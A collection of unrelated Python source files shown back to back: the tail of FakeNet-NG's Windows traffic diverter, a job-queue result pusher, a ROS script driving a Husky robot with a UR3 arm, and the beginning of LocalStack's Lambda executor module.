super(self.__class__, self.__class__).sport.fset(self, new_sport)
if self.proto:
self.wdpkt.src_port = new_sport
# dport overrides
@property
def dport(self):
return self._dport
@dport.setter
def dport(self, new_dport):
super(self.__class__, self.__class__).dport.fset(self, new_dport)
if self.proto:
self.wdpkt.dst_port = new_dport
class Diverter(DiverterBase, WinUtilMixin):
def __init__(self, diverter_config, listeners_config, ip_addrs,
logging_level=logging.INFO):
# Populated by winutil and used to restore modified Interfaces back to
# DHCP
self.adapters_dhcp_restore = list()
self.adapters_dns_restore = list()
super(Diverter, self).__init__(diverter_config, listeners_config,
ip_addrs, logging_level)
self.running_on_windows = True
if not self.single_host_mode:
self.logger.critical('Windows diverter currently only supports '
'SingleHost mode')
sys.exit(1)
# Used (by winutil) for caching of DNS server names prior to changing
self.adapters_dns_server_backup = dict()
# Configure external and loopback IP addresses
self.external_ip = self.get_best_ipaddress()
if not self.external_ip:
self.external_ip = self.get_ip_with_gateway()
if not self.external_ip:
self.external_ip = socket.gethostbyname(socket.gethostname())
self.logger.debug('External IP: %s Loopback IP: %s' %
(self.external_ip, self.loopback_ip))
#######################################################################
# Initialize filter and WinDivert driver
# Interpose on all IP datagrams so they appear in the pcap, let
# DiverterBase decide whether they're actually forwarded etc.
self.filter = 'outbound and ip'
# Initialize WinDivert
try:
self.handle = WinDivert(filter=self.filter)
self.handle.open()
except WindowsError as e:
if e.winerror == 5:
self.logger.critical('ERROR: Insufficient privileges to run '
'windows diverter.')
self.logger.critical(' Please restart with '
'Administrator privileges.')
sys.exit(1)
elif e.winerror == 3:
self.logger.critical('ERROR: Could not locate WinDivert DLL '
'or one of its components.')
self.logger.critical(' Please make sure you have copied '
'FakeNet-NG to the C: drive.')
sys.exit(1)
else:
self.logger.critical('ERROR: Failed to open a handle to the '
'WinDivert driver: %s', e)
sys.exit(1)
###########################################################################
# Diverter controller functions
def startCallback(self):
# Set local DNS server IP address
if self.is_set('modifylocaldns'):
self.set_dns_server(self.external_ip)
# Stop DNS service
if self.is_set('stopdnsservice'):
self.stop_service_helper('Dnscache')
self.logger.debug('Diverting ports: ')
self.flush_dns()
self.diverter_thread = threading.Thread(target=self.divert_thread)
self.diverter_thread.daemon = True
self.diverter_thread.start()
return True
def divert_thread(self):
try:
while True:
wdpkt = self.handle.recv()
if wdpkt is None:
self.logger.error('ERROR: Can\'t handle packet.')
continue
pkt = WindowsPacketCtx('divert_thread', wdpkt)
cb3 = [
self.check_log_icmp,
self.redirIcmpIpUnconditionally
]
cb4 = [
self.maybe_redir_port,
self.maybe_fixup_sport,
self.maybe_redir_ip,
self.maybe_fixup_srcip,
]
self.handle_pkt(pkt, cb3, cb4)
# Attempt to send the processed packet
self.setLastErrorNull() # WinDivert/LastError workaround
try:
self.handle.send(pkt.wdpkt)
except Exception as e:
protocol = 'Unknown'
if pkt.proto:
protocol = pkt.proto
elif pkt.is_icmp:
protocol = 'ICMP'
self.logger.error('ERROR: Failed to send %s %s %s packet',
self.pktDirectionStr(pkt),
self.pktInterfaceStr(pkt), protocol)
self.logger.error(' %s' % (pkt.hdrToStr()))
self.logger.error(' %s', e)
except WindowsError as e:
if e.winerror in [4, 6, 995]:
return
else:
raise
def stopCallback(self):
if self.pcap:
self.pcap.close()
self.handle.close()
# Restore DHCP adapter settings
for interface_name in self.adapters_dhcp_restore:
cmd_set_dhcp = ('netsh interface ip set address name="%s" dhcp' %
interface_name)
# Restore DHCP on interface
try:
subprocess.check_call(cmd_set_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
self.logger.error('Failed to restore DHCP on interface %s.' %
interface_name)
else:
self.logger.info('Restored DHCP on interface %s' %
interface_name)
# Restore DHCP adapter settings
for interface_name in self.adapters_dns_restore:
cmd_del_dns = ('netsh interface ip delete dns name="%s" all' %
interface_name)
cmd_set_dns_dhcp = ('netsh interface ip set dns "%s" dhcp' %
interface_name)
# Restore DNS on interface
try:
subprocess.check_call(cmd_del_dns, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
subprocess.check_call(cmd_set_dns_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
self.logger.error("Failed to restore DNS on interface %s." %
interface_name)
else:
self.logger.info("Restored DNS on interface %s" %
interface_name)
# Restore DNS server
if self.is_set('modifylocaldns'):
self.restore_dns_server()
# Restart DNS service
if self.is_set('stopdnsservice'):
self.start_service_helper('Dnscache')
self.flush_dns()
return True
def pktInterfaceStr(self, pkt):
"""WinDivert provides is_loopback which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'loopback' if pkt.wdpkt.is_loopback else 'external'
def pktDirectionStr(self, pkt):
"""WinDivert provides is_inbound which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'inbound' if pkt.wdpkt.is_inbound else 'outbound'
def redirIcmpIpUnconditionally(self, crit, pkt):
"""Redirect ICMP to loopback or external IP if necessary.
On Windows, we can't conveniently use an iptables REDIRECT rule to get
ICMP packets sent back home for free, so here is some code.
"""
if (pkt.is_icmp and
pkt.dst_ip not in [self.loopback_ip, self.external_ip]):
self.logger.info('Modifying ICMP packet (type %d, code %d):' %
(pkt.icmp_type, pkt.icmp_code))
self.logger.info(' from: %s' % (pkt.hdrToStr()))
pkt.dst_ip = self.getNewDestinationIp(pkt.src_ip)
self.logger.info(' to: %s' % (pkt.hdrToStr()))
return pkt
def main():
diverter_config = {'redirectalltraffic': 'no',
'defaultlistener': 'DefaultListener',
'dumppackets': 'no'}
listeners_config = {'DefaultListener': {'port': '1337', 'protocol': 'TCP'}}
diverter = Diverter(diverter_config, listeners_config)
diverter.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
diverter.stop()
###########################################################################
# Run tests
# TODO
if __name__ == '__main__':
main()
|
resultPusher.py
|
#!/usr/bin/env python
"""
Script: resultPusher
Checks the queue for completed jobs, and notifies <mqsub> instances that the corresponding job has been completed.
Runs on the same machine from which jobs have been submitted.
"""
#
# Fix: push results only for the local machine. (the mq task directory should record the machine name on which
# the mqsub script ran.)
#
from Operations.MiscUtil import SlurpFile, DumpFile, GetHostName, coerceVal, FirstLineOfFile, dbg
import os, errno, time, getpass, multiprocessing, optparse, sys, random, logging, contextlib, signal
def GetTaskAttr( fname, attrName, defaultVal = None ):
"""Return the specified attribute of a task, or the specified default value if the task does not have this attribute."""
for line in SlurpFile( fname ).rstrip('\n').split('\n'):
arg, val = line.split('\t')
if arg == attrName: return coerceVal( val )
return defaultVal
def GetSubmitHost( submithostFN ):
"""Return the name of the host on which the task runs"""
return FirstLineOfFile( submithostFN )
def PushResults( options ):
"""Push finished results"""
logging.info( 'Starting result pusher as process %d on host %s with options %s' %
( os.getpid(), GetHostName(), options ) )
# check that all queues exist
assert all( os.path.exists( queue ) and os.path.isdir( queue )
for queue in options.queues.split( os.pathsep ) )
stopSignal = [ False ]
def SetStopSignal( sigNum, stkFrm ):
logging.info( 'Setting stop signal to stop pushers' )
stopSignal[ 0 ] = True
dbg( '"aftset" stopSignal' )
signal.signal( signal.SIGUSR2, SetStopSignal )
while not stopSignal[0]:
for queue in options.queues.split( os.pathsep ):
logging.info( 'Pushing results in ' + queue + '...' )
# find an unclaimed task in this queue, and try to claim it
try: taskDirs = filter( lambda f: f.startswith('mq'), os.listdir( queue ) )
except EnvironmentError as e:
logging.info( 'Error getting list of tasks in queue ' + queue + ': ' + str( e ) )
# sleep a bit -- maybe it's some transient condition that will resolve itself
time.sleep( 60 + random.normalvariate( 3.0, 1.0 ) )
continue
for taskDir in taskDirs:
fullTaskDir = os.path.join( queue, taskDir )
try:
pushingFN = os.path.join( fullTaskDir, 'pushing.dat' )
submithostFN = os.path.join( fullTaskDir, 'submithost.txt' )
if os.path.exists( os.path.join( fullTaskDir, 'completed.dat' ) ) \
and os.path.exists( submithostFN ) and GetSubmitHost( submithostFN ) == GetHostName() \
and not os.path.exists( pushingFN ):
try:
fd = os.open( pushingFN, os.O_CREAT|os.O_EXCL|os.O_WRONLY )
except EnvironmentError as e:
if e.errno not in ( errno.EEXIST, errno.EACCES, errno.EAGAIN ): raise
# another resultPusher beat us to this task -- go and check other tasks
continue
os.write( fd, 'result being pushed by process %d on host %s' % ( os.getpid(), GetHostName() ) )
os.close( fd )
taskDescr = ''
try:
attrsFN = os.path.join( fullTaskDir, 'attrs.tsv' )
if os.path.exists( attrsFN ):
taskDescr += ' output in ' + GetTaskAttr( attrsFN, 'piperun_outputSavedTo' )
except EnvironmentError as e:
logging.info( 'Could not read attrs for task in ' + fullTaskDir + ': ' + str( e ) )
try:
infoFNs = [ os.path.join( fullTaskDir, f ) for f in 'command.dat', 'attrs.tsv', 'claimed.dat' ]
infoContents = '\n'.join([ SlurpFile( f ) if os.path.exists( f ) else 'missing file: ' + f
for f in infoFNs ])
thePipe = os.open( os.path.join( fullTaskDir, 'getresult' ), os.O_WRONLY | os.O_NONBLOCK )
exitCodeReadOk = False
writeOk = False
closeOk = False
exitCode = 'UNKNOWN'
try:
exitCode = SlurpFile( os.path.join( fullTaskDir, 'exitCode.dat' ) ).strip()
exitCodeReadOk = True
os.write( thePipe, exitCode )
writeOk = True
finally:
os.close( thePipe )
closeOk = True
logging.info( 'Pushed result in ' + fullTaskDir + ': ' + ( 'nonzero ' if exitCode != '0' else '' ) + 'exit code ' + exitCode + taskDescr )
if not writeOk or not closeOk or not exitCodeReadOk: dbg( 'exitCodeReadOk writeOk closeOk' )
if exitCodeReadOk and exitCode != '0': logging.info( infoContents )
except EnvironmentError as e:
logging.info( 'The task at ' + fullTaskDir + ' seems to have been orphaned: ' + e.strerror )
except EnvironmentError as e:
logging.info( 'Error processing queue ' + queue + ' task ' + taskDir + ': ' + str( e ) )
# sleep a bit -- maybe it's some transient condition that will resolve itself
time.sleep( 60 + random.normalvariate( 3.0, 1.0 ) )
# if we pushed at least something, go back and try again. if not, wait.
time.sleep( options.sleepInterval + random.normalvariate( 3.0, 1.0 ) )
allPushers = []
def StartPushers( use_args = None, as_daemons = False ):
parser = optparse.OptionParser()
parser.add_option( '-P', '--num-result-pushers', type='int', dest = 'numResultPushers',
help='create NUMPROCS parallel result pushers', metavar='NUMPROCS',
default=1 )
parser.add_option( '-Q', '--queues', dest = 'queues',
default = os.path.join( '..', 'Other', 'queues', getpass.getuser() ),
help='push results for the specified QUEUES', metavar='QUEUES' )
parser.add_option( '-S', '--sleepInterval', type='int',
help = 'between checks, sleep for SEC seconds', metavar = 'SEC', default = 20 )
dbg( 'use_args' )
(options, args) = parser.parse_args( args = sys.argv[1:] if use_args is None else list( use_args ) )
dbg( 'options args' )
assert not args
for i in range( options.numResultPushers ):
p = multiprocessing.Process( target = PushResults, args = ( options, ) )
allPushers.append( p )
p.daemon = as_daemons
p.start()
time.sleep( min( 1.0, random.normalvariate( 4.0, 1.0 ) ) )
def StopPushers():
"""Stop all runners"""
for pusher in allPushers:
if pusher.pid is not None:
os.kill( pusher.pid, signal.SIGUSR2 )
pusher.join()
@contextlib.contextmanager
def RunPushers( use_args = None ):
"""Do things while running result pushers"""
StartPushers( use_args )
yield
StopPushers()
if __name__ == '__main__':
print 'STARTING PUSHERS FROM MAIN'
StartPushers()
|
control_Husky_UR3_5.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import sys
import rospy
import copy, math
import threading
import time
from math import pi, radians, degrees, atan2, sqrt
from moveit_commander import MoveGroupCommander, RobotCommander
from moveit_commander import PlanningSceneInterface, roscpp_initialize, roscpp_shutdown
from moveit_commander.conversions import pose_to_list
from geometry_msgs.msg import PoseStamped, Pose, Point, Quaternion, Twist
from moveit_msgs.msg import Grasp, GripperTranslation, PlaceLocation, MoveItErrorCodes, DisplayTrajectory
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import random
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped, Quaternion
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from std_msgs.msg import String
from nav_msgs.msg import Odometry
#GROUP_NAME_GRIPPER = "NAME OF GRIPPER"
roscpp_initialize(sys.argv)
rospy.init_node('control_Husky_UR3', anonymous=True)
robot = RobotCommander()
scene = PlanningSceneInterface()
##모바일 파트 관련 변수 선언
x = 0.0
y = 0.0
theta = 0.0
## 매니퓰레이터 변수 선언
group_name = "ur3_manipulator"
move_group = MoveGroupCommander(group_name)
FIXED_FRAME = 'world'
display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
DisplayTrajectory,
queue_size=20)
def newOdom(msg):
global x
global y
global theta
x = msg.pose.pose.position.x
y = msg.pose.pose.position.y
rot_q = msg.pose.pose.orientation
(roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])
def move_base(a,b): #x,y좌표를 받아와서 그곳으로 platform을 움직이는 코드 theta는 x와 y좌표에 의해 정해짐.(원점기준)
sub = rospy.Subscriber("/odometry/filtered", Odometry, newOdom)
pub = rospy.Publisher("/cmd_vel", Twist, queue_size = 1)
speed = Twist()
r = rospy.Rate(4)
goal = Point()
goal.x = a
goal.y = b
goal_angle = atan2(goal.y,goal.x)
while abs(goal.x-x) >0.1 or abs(goal.y-y) >0.1 or abs(goal_angle-theta) >0.1 : #가까의 범위가 0.1이내로 들어오면 break.
inc_x = goal.x -x
inc_y = goal.y -y
angle_to_goal = atan2(inc_y, inc_x)
if abs(angle_to_goal - theta) > 0.1:
speed.linear.x = 0.0
speed.angular.z = 0.3
if(angle_to_goal -theta)>0 and (angle_to_goal -theta)<0.1: # 범위 이내로 들어오면 속도를 매우 줄여서 목표점을 지나쳐버리는 일이 없도록함.
speed.linear.x = 0.0
speed.angular.z = -0.02
elif(angle_to_goal-theta)<0 and (angle_to_goal -theta)>-0.1:
speed.linear.x = 0.0
speed.angular.z = 0.02
else:
speed.linear.x = 0.3
speed.angular.z = 0.0
if abs(goal.x-x)<0.1 and abs(goal.y-y)<0.1: # 범위 이내로 들어오면 속도를 매우 줄여서 목표점을 지나쳐버리는 일이 없도록함.
speed.linear.x = 0.01
speed.angular.z = 0.0
print goal.x-x, goal.y-y, goal_angle-theta
pub.publish(speed)
r.sleep()
def move_joint(q1,q2,q3,q4,q5,q6):
joint_goal = move_group.get_current_joint_values()
mobile_joints = [-pi/3, 0.5]
joint_goal_list = [q1,q2,q3,q4,q5,q6]
#매니퓰레이터 관절 value 설정
joint_goal[0] = joint_goal_list[0]
joint_goal[1] = joint_goal_list[1]
joint_goal[2] = joint_goal_list[2]
joint_goal[3] = joint_goal_list[3]
joint_goal[4] = joint_goal_list[4]
joint_goal[5] = joint_goal_list[5]
#제어시작
move_group.go(joint_goal, wait=True)
#bool rotation_init = true
def move_mobile_manipulator(a,b,q1,q2,q3,q4,q5,q6):
move_joint(pi*90/180, pi*-130/180 , pi*111/180, pi*-68/180, pi*-90/180, 0) #UR3 home pose
sub = rospy.Subscriber("/odometry/filtered", Odometry, newOdom)
pub = rospy.Publisher("/cmd_vel", Twist, queue_size = 1)
speed = Twist()
r = rospy.Rate(4)
goal = Point()
goal.x = a
goal.y = b
final_angle_to_goal = atan2(b, a)
arrival_radius = 0.1
while (goal.x-x)**2 + (goal.y-y)**2 >= arrival_radius :
#while abs(goal.x-x) >0.1 or abs(goal.y-y) >0.1 or abs(angle_to_goal-theta) >0.1 : #가까의 범위가 0.3이내로 들어오면 break.
inc_x = goal.x -x
inc_y = goal.y -y
angle_to_goal = atan2(inc_y,inc_x)
if abs(angle_to_goal - theta) > 2*pi/180:
speed.linear.x = 0.0
speed.angular.z = 0.3
if abs(angle_to_goal - theta) < 5*pi/180: # 0.5이내로 들어오면 속도를 매우 줄여서 목표점을 지나쳐버리는 일이 없도록함.
speed.angular.z = 0.03
speed.linear.x = 0.0
else:
speed.linear.x = 0.2
speed.angular.z = 0.0
if abs(goal.x-x) <0.3 and abs(goal.y-y)<0.3: #x,y val이 0.3이내로 들어오면 속도 매우 줄임.
speed.angular.x = 0.05
speed.angular.z = 0.0
print goal.x-x, goal.y-y, angle_to_goal-theta
pub.publish(speed)
r.sleep()
print 'final angle:',final_angle_to_goal,'theta:',theta
t = 0
init_time = time.time()
while abs(angle_to_goal - theta) > 2*pi/180:
if theta-final_angle_to_goal>0:
speed.linear.x = 0
speed.angular.z = -0.1
else:
speed.linear.x = 0
speed.angular.z = 0.1
#if abs(theta-final_angle_to_goal) <0.3:
# speed.linear.x = 0
# speed.angular.z = 0.03
pub.publish(speed)
r.sleep()
cur_time = time.time()
t = cur_time-init_time
print t,'sec'
move_joint(q1,q2,q3,q4,q5,q6) #매니퓰레이터 조인트
def move_base_thread(a,b):
thread=threading.Thread(target=move_base(a,b))
thread.daemon=True
thread.start()
def move_joint_thread(q1,q2,q3,q4,q5,q6):
thread=threading.Thread(target=move_joint(q1,q2,q3,q4,q5,q6))
thread.daemon=True
thread.start()
def get_pose():
robot_state = move_group.get_current_pose()
robot_angle = move_group.get_current_joint_values()
print("=====robot_state====")
print(robot_state)
print("=====robot_angle====")
print(robot_angle)
if __name__=='__main__':
move_mobile_manipulator(1,1,pi/2,-pi/2,0,0,0,0)
#move_mobile_manipulator(1.1,1.1,pi/2,0,0,0,0,0)
# function? origin(0, 0, 0) -> (10, 20, 80)
# move_mobile_manipulator( 1.4001 , 0.6723 , 1.5700 , -0.8131 , 0.8344 , -1.4314 , -1.5700 , 0)
#move_mobile_manipulator(1.2,1.2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(1.3,1.3,pi/2,0,0,0,0,0)
#move_mobile_manipulator(1.4,1.4,pi/2,0,0,0,0,0)
#
#move_mobile_manipulator(2,2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(-2,-2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(0.25,0.25,pi/2,0,0,0,0,0)
#get_pose()
|
lambda_executors.py
|
import base64
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Tuple
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
FuncThread,
get_docker_container_names,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = "/aws/lambda/%s" % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in get_docker_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class InvocationResult(object):
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(
self,
func_arn,
func_details,
event,
context=None,
version=None,
asynchronous=False,
callback=None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
func_details, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
pass
def cleanup(self, arn=None):
pass
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
env_vars = dict(env_vars or {})
runtime = func_details.runtime or ""
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and func_details
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
func_details, env_vars, command, event_stdin_bytes
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def prepare_event(self, environment, event_body):
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, func_arn, func_details, event, context=None, version=None):
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment["LOCALSTACK_HOSTNAME"] = main_endpoint
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment["_HANDLER"] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % func_details.arn())
result = self.run_lambda_executor(
event=stdin, env_vars=environment, func_details=func_details
)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
